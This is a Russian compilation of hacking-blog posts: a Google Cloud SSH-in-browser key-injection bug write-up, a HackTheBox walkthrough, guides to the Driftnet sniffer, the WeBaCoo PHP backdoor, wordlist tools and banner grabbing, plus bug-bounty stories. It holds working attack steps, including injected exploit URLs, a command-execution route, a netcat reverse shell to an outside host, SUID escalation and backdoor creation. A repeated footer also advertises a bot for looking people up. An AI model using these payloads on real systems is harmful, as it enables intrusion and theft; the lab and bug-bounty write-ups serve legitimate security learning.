После постоянного поиска ошибок в обычных приложениях Google, таких как Drive, мы захотели перейти в Google Cloud. Это была первая уязвимость, которую мы обнаружили на платформе и которая привела к RCE в один клик в инстансе Compute Engine пользователя-жертвы.

Это были наши первые шаги в Google Cloud и мы, естественно, наткнулись на один из самых популярных продуктов — Compute Engine. Изучая его возможности и то, как он работает, я заметил «SSH-in-browser». Это функция в GCP, которая позволяет пользователям получать доступ к своим инстансам в браузере через SSH. Визуально этот интерфейс очень похож на Cloud Shell.

Я рассматривал различные функции и опции SSH-in-browser и моё внимание привлекла возможность изменить имя пользователя.

В этом диалоговом окне вводится имя пользователя, которое затем передается на сервер через GET параметр newLinuxUsername. Даже если указанное имя пользователя не существует, он создаст нового пользователя с указанным именем и зарегистрирует вас как этого пользователя.

https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername={USERNAME}

Поскольку не было никакого рандомного токена или защиты от CSRF, любой мог создать ссылку и отправить ее пользователю Compute Engine, чтобы создать нового пользователя в его экземпляре. Не очень впечатляюще, но есть на что обратить внимание. Но самое интересное заключалось в том, что, по крайней мере, на первый взгляд, это выглядело так, как будто он просто принимал пользовательский ввод и передавал его в useradd или adduser.

Я попытался добавить полезные нагрузки, такие как `whoami`, $(whoami), чтобы увидеть, будут ли они выполнены. Однако ничего не произошло. Чтобы проверить инъекцию команды второго порядка, я попробовал `curl https://stazot.com` в качестве полезной нагрузки. И снова ничего не произошло. Я вернулся на страницу инстанса Compute Engine и начал искать другие вещи.

Я заметил, что в разделе «Ключи SSH» были перечислены имена пользователей, которые я использовал в качестве полезной нагрузки. Этот раздел содержит список всех пользователей и их соответствующие добавленные или сгенерированные SSH-ключи. В то время как полезные нагрузки, такие как `whoami` были отображены как есть, полезная нагрузка curl была указана странным образом.

Поле имени пользователя содержало `curl http, а поле SSH ключа содержало stazot.com`:ssh-key-value В тот же миг в моей голове зазвенели колокольчики.

Сервер использовал символ двоеточия :в качестве разделителя. Всё, что до :считалось именем пользователя, а все после : считалось SSH-ключом для этого пользователя. Теоретически, это должно позволить злоумышленнику ввести имя пользователя и свой открытый SSH-ключ. Это возможно, потому что, как отмечалось ранее, сервер принимает этот ввод в GET запросе и не имеет защиты от CSRF.

Таким образом, если заставить жертву открыть вредоносную ссылку, то добавится имя пользователя и SSH-ключ злоумышленника. Чтобы проверить уязвимость, я создал следующий URL-адрес с attacker:{URL-ENCODED-SSH-PUBLIC-KEY} в качестве полезной нагрузки:

https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}

Открыл ссылку как жертва — и попытался войти в инстанс как злоумышленник. Однако это не сработало. Причина заключалась в том, что добавленный мной SSH-ключ был добавлен к SSH-ключу, сгенерированному Google в серверной части. Чтобы исправить это, я добавил символы возврата строки к полезной нагрузке:

https://ssh.cloud.google.com/v2/ssh/projects/{PROJECT-NAME}/zones/{INSTANCE-ZONE}/instances/{INSTANCE-NAME}?newLinuxUsername=attacker:{URL-ENCODED-SSH-PUBLIC-KEY}%0d%0a

Как только жертва открыла эту ссылку, я попытался войти в этот инстанс как злоумышленник — и это сработало! Я вошел в систему на целевой машине с правами sudo.

Вот видео, демонстрирующее атаку:

Почему существовала эта ошибка?

Это поведение существовало для облегчения авторизации через функцию SSH-in-browser. Поскольку браузер действует как SSH-клиент, для входа в инстанс ему требуется авторизованный SSH-ключ.

Compute Engine обрабатывает это, создавая SSH-ключ для каждого пользователя в экземпляре (который использует SSH-in-browser) и сохраняет его в метаданных. Когда пользователь входит в систему с помощью SSH-in-browser, инстанс извлекает все авторизованные SSH-ключи с сервера метаданных и регистрирует пользователя.

Это очень сложный процесс, который подробно описан здесь.

Оригинал на английском тут.

Исследователи из ИБ-компании Checkmarx выяснили подробности продолжающейся атаки на цепочку поставок, которая использует вредоносные PyPI-пакеты для распространения вредоносного ПО W4SP Stealer , и на сегодняшний день жертвами злоумышленников стали более 100 жертв. По словам эксперта Checkmarx Йоссефа Харуш, кибепреступник по-прежнему активен и выпускает новые вредоносные пакеты. Харуш назвал злоумышленника «WASP».

🧑🏻‍💻Читать далее

🛡В Госдуму внесли законопроект о конфискации имущества у киберпреступников

Законопроектом предлагается дополнить пункт «а» части 1 статьи 104.1 («Конфискация имущества») Уголовного кодекса РФ статьями 272—274.1. Это даст возможность конфисковывать имущество, полученное в результате неправомерного доступа к компьютерной информации (статья 272), создания, использования и распространения вредоносных программ (статья 273), нарушения правил эксплуатации, средств хранения, обработки или передачи компьютерной информации (статья 274) и неправомерного воздействия на критическую информационную инфраструктуру РФ (статья 274.1).

📖Прочитать

❕МИД РФ предупредил о том, что мобильные устройства россиян могут прослушиваться на территории ЕС

Иван Нечаев, замглавы департамента информации и печати Министерства иностранных дел РФ, во время общения с журналистами заявил, что мобильные устройства граждан России, которые на данный момент пребывают на территории Европейского союза, могут быть прослушаны третьими лицами, сообщают «Известия».

🧑🏻‍💻Подробности

𝚝𝚑𝚎 𝚖𝚊𝚝𝚛𝚒𝚡

Мы уже рассказывали, как используя Wireshark перехватить трафик. Каким бы хорошим ни был Wireshark, его нельзя использовать для перехвата изображений, передаваемых по сети. Далее рассмотрим инструмент Driftnet, с помощью которого попробуем перехватить изображения в локальной сети.

Еще по теме: Сетевая разведка и перехват трафика с помощью ARP

Driftnet – это инструмент, который может прослушивать сетевой трафик и перехватывать изображения из TCP потока. В новой бета версии добавлена возможность перехвата видео в формате MPEG и аудио в различных форматах.

Но как Дрифтнет перехватывает эти изображения? Эти изображения передаются по сети без какого-либо шифрования. Следовательно, Driftnet может их перехватить.

Перехват изображений в локальной сети с помощью Driftnet

Для этого урока нам понадобится любая программа, которая передает изображений по сети. Я буду использовать Netop Vision Pro. Как следует из названия, это ПО для управления классом, используемое для дистанционного обучения. Программа состоит из двух частей:

• Модуль «Учитель»
• Модуля «Студент»

Модуль «Учитель» устанавливается на одну систему, а модуль «Ученик» — на всех контролируемых системах. Компьютер, на котором запущен модуль «Учитель», имеет полный контроль над компьютером, на котором запущен модуль «Ученик», а у ученика нет или очень ограниченная роль.

Самая важная деталь – учитель может просматривать рабочий стол учащегося. Это функция нам нужна для перехвата изображений передаваемых по сети.

Создание стенда для перехвата изображений

Для демонстрации работы Driftnet, нам понадобятся:

• Системы Windows с модулем Netop Vision. На одной будет установлен модуль Netop Vision Teacher, а на другой Student.
• Kali Linux, которая является атакующей системой и используется для перехвата изображений.

Установка Netop Vision Student

Сначала настроим лабораторию. Скачаем и установим Netop Vision.

После завершения установки, перезагрузим все компьютеры и добавим системы с установленным модулем «Ученик» в главный командующий модуль «Учитель»

Теперь нам понадобиться Kali Linux. Вы можете установить Kali Linux на флешку или использовать Kali Linux на Windows под WSL.

Стенд готов.

Установка и использование Driftnet для перехвата изображения

Теперь установим Driftnet на Kali Linux:

1sudo apt-get install driftnet

Проверьте имя сетевого интерфейса.

1ip a

Теперь все, что нужно сделать, это запустить Driftnet на выбранном интерфейсе.

1sudo driftnet -i eth0

Откроется небольшое окно, как показано ниже.

Снимки экрана компьютера получает модуль учителя, через регулярные короткие промежутки времени. Когда вы развернете окно, вы увидите передаваемые изображения рабочего стола ученика.

Параметры и аргументы Driftnet:

• -h – отображает справку.
• -b – сигнализирует при захвате нового изображения.
• -i – выбор интерфейса для прослушивания (по умолчанию используются все интерфейсы).
• -f файл – открывает сохраненные захваченные пакеты из дампа файла pcap.
• -a – не выводит изображения на экране, а только сохраняет их во временную директорию и отображает имена в стандартном выводе.
• -m количество – максимальное количество перехваченных изображений для хранения во временной директории в режиме-a.
• -d директория – устанавливает временную директорию.
• -x префикс – префикс для использования во время сохранения изображений.
• -s – вместе с изображениями пытаться извлечь потоковое аудио из сети.
• -S – перехватывает только потоковое аудио.

На этом все. Вот так можно перехватить изображения в локальной сети.

РЕКОМЕНДУЕМ:

• Перехват трафика с помощью HTTP Toolkit
• Использование STP Root Hijacking для перехвата трафика

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

В этой статье рассмотрим прохождение уязвимой машины OpenSource Hack The Box, в рамках которой будем взламывать удаленных хост через Git и поднимать привилегии используя одну из техник GTFOBins,

Еще по теме: Как взломать сайт WordPress
Лучше подключаться к машине HTB с помощью VPN. И желательно не делать это со своего личного компа, на котором хранится чувствительная информация. Взлом удаленного хоста через Git и привилегии с GTFOBins

Взлом веб-сервера на PHP

Для начала до­бав­им IP-адрес машины в /etc/hosts:

110.10.11.164 opensource.htb

Начнем со сканирования портов. Это стан­дар­тная операция при любом пентесте. Сканирование портов позволит определить, какие служ­бы на машине при­нима­ют соеди­нение.

Для этого отлично подходит популярный сканер Nmap. Следующий скрипт улучшит резуль­таты сканирования:

123#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. Пер­вый про­изво­дит­ просто быс­трое ска­ниро­вание, вто­рой — глубокое ска­ниро­вание, используя име­ющиеся скрип­ты (опция—A)

Сканер смог найти только два откры­тых пор­та:

• 22 — служ­ба OpenSSH 7.6p1
• 80 — веб‑сер­вер Python Werkzeug 2.1.2; а

Так­же филь­тру­ющийся порт 3000. Взглянем на веб-сервер.

Находим ссыл­ку на фай­л. Исходя из названия можно догадаться, что это какой-то исходный код.

В архи­ве лежит каталог .git, который стоит изучить.

Рас­паковываем его и заходим в директорию, содер­жащую репози­торий Git. Пос­ле чего расмотрим сущес­тву­ющие вет­ки.

1git branch

Далее получаем исто­рию ком­митов. Рассмотрим ее получше.

1git log dev

Те­перь прос­матри­ваем каж­дый ком­мит в надеж­де най­ти важ­ные дан­ные. И в одном из них обна­ружи­ваем URL прок­си‑сер­вера с ука­зан­ными учет­ными дан­ными.

1git show a76f8f75f7a4a12b706b0cf9c983796fa1985820

Боль­ше в репози­тории ничего не находим, поэто­му начина­ем изу­чать исходный код при­ложе­ния.

Как видишь, мы можем заг­ружать фай­лы с любым рас­ширени­ем. Сра­зу бро­сает­ся в гла­за фун­кция os.path.join — стро­ка 14. Пос­ледова­тель­ность ../ филь­тру­ется, что не поз­волит записать свой SSH-ключ поль­зовате­лю, даже если мы узна­ем путь. Одна­ко файл сох­раня­ется с тем же име­нем без вся­ких вре­мен­ных меток, что дает нам воз­можность переза­писы­вать сущес­тву­ющие фай­лы.

Точка опоры

Да­вай поп­робу­ем переза­писать текущий файл, добавив в его конец свой обра­бот­чик, к при­меру /ralf.

123@app.route('/ralf')def ralf(): return os.system(request.args.get('cmd'))

Ссыл­ку на стра­ницу для заг­рузки фай­ла най­дем чуть ниже кноп­ки ска­чива­ния репози­тория.

Заг­рузим наш новый файл view.py и перех­ватим зап­рос на заг­рузку в Burp Intercept.

Для переза­писи фай­ла изме­ним filename и вмес­то views.py запишем пол­ный путь к это­му фай­лу — /app/app/views.py.

Ког­да все будет готово, отпра­вим зап­рос даль­ше на сер­вер. На стра­нице получим сооб­щение, что заг­рузка прош­ла успешно.

Те­перь мы можем выпол­нять коман­ды и сра­зу поп­робу­ем запус­тить реверс‑шелл:

1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4321 >/tmp/f

Я выпол­нял зап­рос через curl, поэто­му мне нуж­но было закоди­ровать реверс‑шелл в кодиров­ку URL. Burp Encoder закоди­рует абсо­лют­но все сим­волы, а не толь­ко спе­циаль­ные. Это не очень удоб­но, поэто­му я прос­то встав­ляю текст в Burp Repeater и кодирую ком­бинаци­ей кла­виш Ctrl-U. Одна­ко сго­дит­ся и любой дру­гой метод.

1curl 'http://opensource.htb/ralf?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.49 4321 >/tmp/f'

1curl 'http://opensource.htb/ralf?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.49+4321+>/tmp/f'

Ос­талось коман­дойrlwrap -cAr nc -lnvp 4321 запус­тить лис­тенер и выпол­нить коман­ду для запус­ка реверс‑шел­ла.

Продвижение

По име­ни поль­зовате­ля понима­ем, что находим­ся внут­ри кон­тей­нера Docker. Даль­нейший путь прод­вижения дол­го искать не при­ходит­ся: вспо­мина­ем про филь­тра­цию под­клю­чений к пор­ту 3000. Сна­чала про­верим адрес докер‑машины, а потом уже поп­робу­ем под­клю­чить­ся к пор­ту 3000 хос­товой.

Для удоб­ной работы через бра­узер нам нуж­но тун­нелиро­вать тра­фик. Я буду исполь­зовать chisel, который нуж­но запус­тить как на локаль­ном хос­те, в качес­тве сер­вера, так и на уда­лен­ном — как кли­ент. В парамет­ре сер­верной час­ти ука­зыва­ем, что ожи­даем под­клю­чения (парамет­ры —reverse), а так­же порт для соз­дания тун­неля.

1chisel.bin server --reverse --port 8000

Те­перь на уда­лен­ной машине ини­циали­зиру­ем кли­ент­скую часть. В парамет­рах ука­зыва­ем адрес сер­вера chisel и порт для под­клю­чения, а так­же нас­трой­ки прок­сирова­ния.

1chisel.bin client 10.10.14.49:8000 R:3000:172.17.0.1:3000

В логах сер­вера дол­жны уви­деть сооб­щение о соз­дании сес­сии.

Та­ким обра­зом, весь тра­фик, который мы пош­лем на локаль­ный порт 3000, будет тун­нелиро­ван на порт 3000 ука­зан­ного хос­та (в дан­ном слу­чае 172.17.0.1) через докер‑машину. Теперь откро­ем сайт в бра­узе­ре и уви­дим Git.

Вос­поль­зовав­шись учет­ными дан­ными, которые мы наш­ли в репози­тории, авто­ризу­емся на сай­те.

Пе­рехо­дим к единс­твен­ному дос­тупно­му репози­торию и видим бэкап домаш­него катало­га поль­зовате­ля.

Ко­неч­но же, нас инте­ресу­ет при­ват­ный ключ SSH.

Ко­пиру­ем его на локаль­ный хост, коман­дой chmod 0600 id_rsa наз­нача­ем необ­ходимые пра­ва и под­клю­чаем­ся с этим клю­чом уже к основно­му хос­ту.

Локальное повышение привилегий

Пер­вым делом я, как обыч­но, поис­кал все сом­нитель­ные нас­трой­ки и поль­зователь­ские скрип­ты с помощью мно­гок­ратно упо­минав­шегося в моих рай­тапах LinPEAS, но ничего не нашел.

Сле­дующий шаг — монито­ринг запус­каемых при­ложе­ний. Что­бы най­ти запус­каемые в сис­теме про­цес­сы, будем исполь­зовать ути­литу pspy64. Заг­рузим ее на хост при помощи wget, а потом выпол­ним.

В выводе отме­чаем исполь­зование коман­ды git, при­чем от име­ни при­виле­гиро­ван­ного поль­зовате­ля (нулевой UID — это root).

Тут я обра­тил­ся к GTFOBins. Это база тех­ник, которые поз­воля­ют повысить при­виле­гии при помощи стан­дар­тных при­ложе­ний Linux. В час­тнос­ти, есть тех­ника исполь­зования Git, которая поз­воля­ет получить ста­биль­ную обо­лоч­ку в при­виле­гиро­ван­ном кон­тек­сте. Нам она под­ходит, толь­ко вмес­то кон­тек­ста sudo у нас будет кон­текст поль­зовате­ля root.

Здесь исполь­зует­ся перех­ватчик Git, который свя­зан с pre-commit. То есть мы можем записать свой скрипт в файл ~/.git/hooks/pre-commit, и код выпол­нится при выпол­нении коман­ды git commit. В качес­тве метода пер­систен­тнос­ти будем уста­нав­ливать S-бит фай­лу коман­дной обо­лоч­ки /bin/bash.

12# echo "chmod u+s /bin/bash" >> ~/.git/hooks/pre-commitmv ~/.git/hooks/pre-commit.sample ~/.git/hooks/pre-commit

Справка: бит SUID

Ког­да у фай­ла уста­нов­лен атри­бут setuid (S-атри­бут), обыч­ный поль­зователь, запус­кающий этот файл, получа­ет повыше­ние прав до поль­зовате­ля — вла­дель­ца фай­ла в рам­ках запущен­ного про­цес­са. Пос­ле получе­ния повышен­ных прав при­ложе­ние может выпол­нять задачи, которые недос­тупны обыч­ному поль­зовате­лю. Из‑за воз­можнос­ти сос­тояния гон­ки мно­гие опе­раци­онные сис­темы игно­риру­ют S-атри­бут, уста­нов­ленный shell-скрип­там.

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

Многие хотят заниматься багхантингом и участвовать в программах Багбаунти, но боятся начать. Я Xail, днем пентестер в хакерской команде Red Team, по ночам багхантер. В этой короткой статье я поделюсь своим кейсом взлома сайта Tesla. Я покажу, как с легкостью смог найти уязвимость класса P1 и заработать на этом немного денег. Надеюсь, мой опыт послужит для вас хорошим примером и будет мотивировать. Погнали!

Еще по теме: Вот как я взломал сайт NASA

Заранее предупреждаю, не ожидайте ничего особо умного. Это был низко висящий фрукт, который можно было сорвать без особых усилий и знаний, но в этом и заключается фишка, кто не хочет без труда сорвать бабла?!

Багбаунти не имеет никакого отношения к батончику с райским вкусом, — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши незаконных действия.Взломал сайт Tesla и получил 10.000$

26 февраля 2021 года в рамках программы багбаунти я сообщил об обнаруженной мною уязвимости на сайте Tesla. Уязвимость позволила мне получить доступ к конфиденциальной информации, наиболее важной из которых был общий ключ IKE, который можно было использовать для подключения к корпоративной сети Tesla.

Вот как все было. После поиска поддоменов и определения серверов, которые прослушивают TCP-порты 80 и 443, я решил зарядить Dirbuster со стандартным списком слов.

Через нескольких часов сканирования, обнаружил интересную вещь. Было включено индексирование на:

1https://trt.teslamotors.com

в каталоге:

1/uploads

Это означало, что я мог просматривать все файлы, которые находились в директории.

Просмотрев различные файлы в каталоге/uploads, я обнаружил файл .zip с именем pdx01.zip. Долго не думая, скачал его на виртуалке и обнаружил внутри несколько файлов конфигурации.

Среди этих файлах мне удалось найти общий ключ VPN, который позволяет аутентифицироваться в корпоративной сети Tesla.

Я также нашел пароли WiFi магазинов Tesla и пароли Radius.

Я сразу же сообщил об этой проблеме Tesla через их программу BugCrowd Bug Bounty. Работники Tesla быстро отреагировали, приняли уязвимость, пометили ее как P1 (высокий уровень угрозы) и устранили проблему. После чего скинули мне 10.000$.

Вот как выглядит моя находка на сайте программы поощрений Tesla.

Спасибо Тесла — это отличный пример компании, которая серьезно относится к безопасности и вознаграждает тех, кто помогает им выявлять и устранять проблемы. Ну и отдельное спасибо за 10.000$, на улице такие деньги не валяются.

Как видите взламывать сайты Тесла, не только прикольно, но и выгодно. Хотя и взломом это трудно назвать )

РЕКОМЕНДУЮ:

• Взлом правительственного сайта Нидерландов
• Лучшие инструменты для поиска уязвимостей сайтов

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

WeBaCoo (Web Backdoor Cookie) — скрипт для создания бэкдора PHP (скрытого соединения между клиентом и веб-сервером через HTTP). Это инструмент пост-эксплуатации, способный поддерживать доступ к скомпрометированному веб-серверу. В этой статье я познакомлю с WeBaCoo и покажу как его использовать на Kali Linux.

Еще по теме: ICMP-туннелирование при пентесте

Что такое WeBaCoo

WeBaCoo — этот скрипт Perl для создания бэкдора и удаленного скрытого подключения к веб-серверу. Инструмент был разработан для работы под радаром современных антивирусов, NIDS (систем обнаружения), IPS (систем предотвращения вторжений), сетевых брандмауэров и брандмауэров приложений.

Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.

Инструмент имеет два режима работы:

• Генерация (-g) — режим для создания бэкдора PHP.
• Терминал (-t) — режим для подключения к бэкдору.

Интересная особенность WeBaCoo заключается в том, что соединение между веб-сервером и клиентом закодировано в файле cookie заголовка HTTP, поэтому его трудно обнаружить антивирусом, системами обнаружения / предотвращения сетевых вторжений, сетевыми брандмауэрами и брандмауэрами приложений.

Установка WeBaCoo

WeBaCoo уже предустановлен на Kali Linux, но если вы используете другой дистрибутив, тогда можете установить черезapt:

1sudo apt install webacoo

Использование WeBaCoo для создания скрытого соединения

Сначала по традиции заглянем в справку WeBaCoo:

1webacoo -h

Теперь используя WeBaCoo, создадим бэкдор PHP:

1webacoo -g -o /home/kali/testbackdoor.php

В приведенной выше команде, мы используем параметр-g для создания бэкдора и параметр-o для выбора местоположения созданного файла (в моем случае — домашний каталог):

1home/kali

После выполнения команды будет создан бэкдор PHP.

Теперь пришло время загрузить его на уязвимый сервер или сайт. Здесь мы предполагаем, что сервер не имеет никаких ограничений, которые могут запрещать определенные расширение или типы загружаемого файла.

Для этого примера, загрузим его на специально уязвимое веб-приложение DVWA, созданное для таких, как мы (этичных хакеров).

После успешной загрузки, будет отображен путь к загруженному файлу (см. скрин выше). Этот путь является фактическим местоположением загруженного файла. Он нужен нам для доступа к полезной нагрузке.

Теперь можем получить доступ к бэкдору PHP с помощью WeBaCoo. Для этого в терминале выполняем команду:

1webacoo -t -u http://127.8.0.1/hackable/uploads/testbackdoor.php

После применения вышеуказанной команды, вы увидите сообщение о подключение бэкдора. Чтобы проверить работу бэкдора, запустим несколько команд.

С помощью префикса: можно управлять бекдором, выполняя различные команды. Со всеми остальными фишками, разберетесь сами.

Вот как можно создать бэкдор PHP с помощью WeBaCo и использовать его для удаленного подключения.

Как видите WeBaCoo очень прост в использовании, но используйте тулзу с умом, не нарушая закон!

РЕКОМЕНДУЕМ:

• Взлом веб-сервера на PHP
• Эксплуатация бэкдора PHP на виртуалке Knife HackTheBox

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

В пентестах и в форензике часто используют атаку Брутфорс (брут). Но успешный брут зависит не только от длины посоха пароля, но и от хорошего словаря. Чтобы подобрать пароль, может потребоваться большой список паролей и логинов. Работа с хорошими большими словарями для брута может быть довольно затруднительна. В этой статье я познакомлю вас, с инструментами Kali Linux, которые облегчат эту задачу.

Еще по теме: Огромный словарь для брута (Английские слова)

Работа с большими словарями для брута на Kali Linux

Манипуляции с большими текстовыми файлами — это всегда неприятные ощущения и геморрой. Если вы когда-нибудь пытались отредактировать текстовый файл размером 10 ГБ на ноутбуке среднего класса, то понимаете о чем я говорю.

В этой ситуации можно использовать два инструмента — Dymerge и просто команды оболочки Bash.

Работа с большими словарями для брута с помощью Dymerge

Dymerge — это скрипт Python для работы словарями для брута. Это простой консольный инструмент, который может объединять словари для брута или добавлять / удалять определенные слова из списка слов.

Для установки Dymerge на Kali Linux:

1git clone https://github.com/k4m4/dymerge

Преходим в каталог dymerge:

1cd dymerge

С помощью команду ls отобразим содержимое:

1ls

Среди файлов находим скрипт Python dymerge.py.

По традиции открываем справку:

1python dymerge.py --help

Видим параметры и возможности.

Итак, на рабочий стол я закинул словари для брута.

Попробуем объединить все текстовые файлы в один большой словарь, а на выходе заархивируем его, чтобы он не занимал много места.

Параметр -o используем для выбора местоположения конечного файла и формата.

Можно также добавить отдельные слова в конечный файл, (добавим, на пример, слово KaliLinuxIn), для этого используем директиву -i.

Параметр-u позволяет удалить повторяющиеся пароли.

Со всеми нашими хотелками, команда будет выглядеть так:

1python dymerge.py /home/kali/Desktop/my-wordlists -u -f -o /home/kali/Desktop/my-wordlistsgiantwordlist.txt -i KaliLinuxIn -z bz2

После выполнения видим следующее:

Дождитесь окончания процесса. Скорость работы зависит от размера и мощности компьютера.

После завершения, в каталоге появился архив «giant-wordlist.txt.bz2.

Так работает Dymerge. В целом это хороший инструмент, но он плохо работает с огромными файлами. Это связано с тем, что он загружает каждое слово из каждого словаря в массив, что может вызвать зависания.

Его можно заменить командами оболочки Bash.

Командами оболочки Bash — хорошая альтернатива DyMerge

Вот некоторые варианты использования Dymerge и аналог команды оболочки Bash.

Команда Dymerge:

1python dymerge.py /usr/share/wordlists/rockyou.txt /lists/cewl.txt -s -u

Аналог Bash:

1sort -u /usr/share/wordlists/rockyou.txt /lists/cewl.txt > output.txt

Команда Dymerge:

1python dymerge.py /lists/cewl.txt /lists/awlg.txt -s -u -i Passw0rd,inpuT

Аналог Bash:

1sort -u /lists/cewl.txt /lists/awlg.txt <(echo 'Passw0rd\ninpuT') > output.txt

Команда Dymerge:

1python dymerge.py ~/fsocity.dic -s -u -r -o ~/clean.txt

Аналог Bash:

1sort -r <~/fsocity.dic | uniq> clean.txt

Команда Dymerge:

1python dymerge.py /dicts/crunch.txt /dicts/john.txt -s -u -f -z bz2

Аналог Bash:

1sort -u /dicts/crunch.txt /dicts/john.txt | bzip2 > output.bz2

С помощью рассмотренных инструментов, вы сможете добавлять, удалять слова (и не только) и обеднять большие словари для брута. Какой инструмент использовать, выбирать только вам.

На сегодня все. Встретимся в следующей статье!

РЕКОМЕНДУЕМ:

• Создание словарей для брута на Kali Linux
• Где находится в Kali Linux популярный словарь Rockyou.txt?

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

Здравствуйте, господа багхантеры! Меня зовут Джениш Паншал и в этой короткой статье я расскажу об уязвимости, связанной с неправильной конфигурацией SSL, и о том, как мне удалось, с помощью простого Гугл Дорка, найти эту уязвимость на сайтах Nokia и Кембриджского университета.

Еще по теме: Интересные уязвимости PostgreSQL

Уязвимости на сайте Nokia и Кембриджского университета

Неправильная конфигурация SSL (SSL Misconfiguration) позволяет инициировать атаку «человек посередине», притворяясь веб-сервером, пока клиент не согласится использовать для подключения шифрование SSL 3.0. Затем злоумышленник получает нужную информацию с помощью автоматизированных инструментов, которые изменяют блоки заполнения и ждут ответа сервера. Подробнее рассказывалось в статье «Уязвимости SSL и TLS-протокола»

Bug Bounty — это программа, которую владелец сайта (web-приложения) проводит для привлечения сторонних специалистов в области ИБ к поиску уязвимостей. При участии в программе Bug Bounty нужно действовать этично и придерживаться установленных правил. Не забывайте, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.

Google Dork Queries — это набор поисковых запросов для выявления грубейших дыр в безопасности. Всего, что должным образом не спрятано от поисковых роботов.

Для краткости такие запросы называют Гугл Дорки или просто дорками, как и тех админов, чьи ресурсы удалось взломать с помощью GDQ. Подробнее о Гугл Дорках и примерах использования, в статье «Что такое Google Dorks».

Для поиска уязвимых ресурсов был использован следующий дорк:

1site:*.target.com inurl:http register signup

Дорк позволяет найти поддомены (в данном случае поддомены Nokia и Кембриджского университета), которые работают на протоколе HTTP и позволяют пользователю зарегистрировать учетную запись в своем веб-приложении.

После того как наметились потенциальные цели. Я сделал следующее:

>Во-первых, зарегистрировался по всем найденным адресам.

После регистрации, не входя созданную учетную запись, запросил сброс пароля нажав на «Забыл пароль».

Проверил, работает ли ссылка для сброса пароля на HTTPS или на HTTP.

Ссылка для сброса пароля работала на HTTP, что указывает на уязвимость SSL.

Письмо об уязвимости SSL было отправлено в Nokia 16 августа утром. В тот же день ночью я получил ответ.

Найти мой репорт и ссылку на профиль может здесь, в разделе за август 2022 год.

Письмо об уязвимости SSL в Кембриджский университет и ответ на него.

Вот, как простая уязвимость и умение использовать Гугл Дорки, может сделать вас успешным багхантером.

РЕКОМЕНДУЮ:

• Инструменты для поиска уязвимостей сайтов
• Вот как я взломал правительственный сайт Нидерландов

Источник

Наши проекты:

- Кибер новости: the Matrix
- Хакинг: /me Hacker
- Кодинг: Minor Code
👁 Пробить человека? Легко через нашего бота: Мистер Пробиватор

Сбор баннеров или как говорят наши иностранные коллеги Banner Gabbing — это получение информации об открытых портах и ​работающих ​службах хоста. Эта техника используются хакерами и пентестерами для анализа системы. В сегодняшней статье я познакомлю вас с лучшими инструментами для сбора баннеров на Kali Linux.

Еще по теме: HTTP-сервер с шифрованием TLS на Kali Linux

Сбор баннеров на Kali Linux

Далее рассмотрим инструменты, которые предустановлены в Kali Linux. Если вы работаете на другом дистрибутиве Linux, вы можете установить их самостоятельно с помощью:

1apt-get install

Речь пойдет об инструментах:

• Whatweb
• Curl
• Wget
• netcat
• telnet
• nikto
• Nmap

Для демонстрации я буду использовать намеренно уязвимый сайт уязвимый сайт testphp.vulnweb от Acunetix, специально разработанный для таких, как мы (этичных хакеров).

Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы были использованы личные устройства автора. Использование подобных инструментов на чужих устройствах без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редак­ция spy-soft.net, ни автор не несут ответс­твен­ность за ваши действия.

Whatweb

Откройте консоль Kali Linuix и выполните команду, добавив при этом урл сайта или IP-адрес:

1whatweb <урл_сайта/ip_адрес>

Я использовал сайт Vulnweb. Вместо урла можно указать IP-адрес.

Curl

В терминале Kali выполните следующую команду:

1curl -I <урл_сайта/ip_адрес>

В curl директива-I извлекает заголовок.

Wget

Большинство из вас могут использовать wget для скачивания файлов в терминале. Но wget также может помочь в сборе баннеров.

Откройте консоль Kali и добавив адрес сайта или IP-адрес, выполните следующую команду:

1wget -q -S <урл_сайта/ip_адрес>

Директива-q позволяет скрыть лишнюю информацию, а-S предназначен для получения ответа сервера.

Результат с параметром-q:

Результат без параметра-q:

Netcat

Способ 1: Откройте терминал Kali и выполните команду:

1nc <имя_хоста/ip_адрес> 80

Введите HTTP/1.1 200 и нажмите Enter.

• HTTP/1.1 — версия HTTP.
